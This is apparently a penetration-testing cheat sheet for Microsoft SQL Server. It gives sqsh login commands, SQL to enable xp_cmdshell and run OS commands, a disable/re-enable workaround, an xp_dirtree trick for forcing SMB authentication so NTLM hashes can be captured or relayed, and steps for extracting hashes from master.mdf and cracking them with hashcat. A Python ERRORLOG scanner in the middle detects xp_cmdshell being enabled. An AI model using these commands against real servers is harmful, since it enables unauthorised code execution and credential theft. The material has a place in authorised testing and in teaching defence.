# MSSQL

Microsoft SQL is similar to other SQL databases and can be accessed using the `sqsh` tool.

```
sqsh -S 10.11.1.31 -U test -P "password"
```

## Remote Shell - XP\_Cmdshell

Remote commands can be executed on the MSSQL hosting system through the sqsh tool.

The following command can be used to enable xp\_cmdshell,

```
EXEC sp_configure 'show advanced options', 1;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
```

The following command can be used to execute commands on the remote system,

```
xp_cmdshell 'whoami';
go
```

{% embed url="https://alamot.github.io/mssql_shell/" %}

If enabling xp\_cmdshell fails, try disabling and re-enabling it with the following commands,

```
--Disable
Use Master

GO
EXEC master.dbo.sp_configure 'xp_cmdshell', 0
RECONFIGURE WITH OVERRIDE

GO

EXEC master.dbo.sp_configure 'show advanced options', 0
RECONFIGURE WITH OVERRIDE
GO

-- Enable
Use Master
GO
EXEC master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE WITH OVERRIDE
GO

EXEC master.dbo.sp_configure 'xp_cmdshell', 1
RECONFIGURE WITH OVERRIDE
GO
```
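A defender-side counterpart to the enable sequence and the disable/re-enable sequence above, added here as an example and not part of the original notes: it scans SQL Server ERRORLOG lines for the `sp_configure` change messages and flags an `xp_cmdshell`-class option being turned on, with a louder verdict when the same session disabled it just before. The log excerpt is constructed, and the ERRORLOG line layout (timestamp, spid, message) is an assumption.

```python
import re
from dataclasses import dataclass

# Message SQL Server writes to ERRORLOG when sp_configure changes an option;
# the timestamp/spid prefix layout is assumed, the message text is the
# server's own wording.
CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options whose enabling gives code execution or outbound access from the SQL host.
WATCHED = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries"}

@dataclass(frozen=True)
class Finding:
    ts: str
    spid: str
    option: str
    kind: str  # "enabled" or "toggled" (disabled then re-enabled by the same spid)

def scan_errorlog(lines):
    findings = []
    last_disabled = {}  # option -> spid that most recently set it to 0
    for line in lines:
        m = CONFIG_CHANGE.match(line)
        if not m or m["option"] not in WATCHED:
            continue
        opt, old, new = m["option"], m["old"], m["new"]
        if new == "0" and old != "0":
            last_disabled[opt] = m["spid"]
        elif new != "0" and old == "0":
            # A disable immediately followed by an enable from the same session
            # matches the reset trick shown above and deserves a louder alert.
            kind = "toggled" if last_disabled.get(opt) == m["spid"] else "enabled"
            findings.append(Finding(m["ts"], m["spid"], opt, kind))
    return findings

# Constructed sample ERRORLOG excerpt (not real server output).
SAMPLE = """\
2024-03-02 10:01:12.33 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 10:01:12.41 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-03-02 10:05:40.02 spid61      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2024-03-02 10:05:41.10 spid61      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE.splitlines()):
        print(f"{f.ts} {f.spid}: {f.option} {f.kind}")
```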

## XP\_Dirtree

This is another undocumented stored procedure in MSSQL that lists files and directories. It takes the following three parameters,

- Files - whether to include the files present in the folders in the output
- Directory - the directory path passed to the procedure
- Depth - the number of sub-folder levels to descend

```
xp_dirtree '<foldername>', <depth>, <files>
```

{% hint style="info" %}
This command comes in handy when you want to trigger an SMB connection through it to a locally hosted SMB server (Impacket-smbserver/NTLMrelayx) and catch the user hash or relay it.
{% endhint %}

## Master Database File

The master.mdf file records all system-level information for a SQL Server instance. It also contains instance-wide metadata such as logon information, endpoints, linked servers and system configuration settings, and it records the existence of all databases and the location of all their files.

However, this file cannot be read while the database is running, because the MSSQL process holds a lock on it. If you do obtain access to it, the login credentials can be extracted from it.

The passwords are stored hashed in the file; they can be extracted using the following script, and the hashes can then be cracked with hashcat.

{% embed url="https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes" %}

The above script can be used for extracting the hashes. If you are on a Linux system, you can use pwsh to run the PowerShell script.

The hash can be cracked as follows,

```
hashcat -a 0 -m 1731 hash /usr/share/wordlists/rockyou.txt --show
```
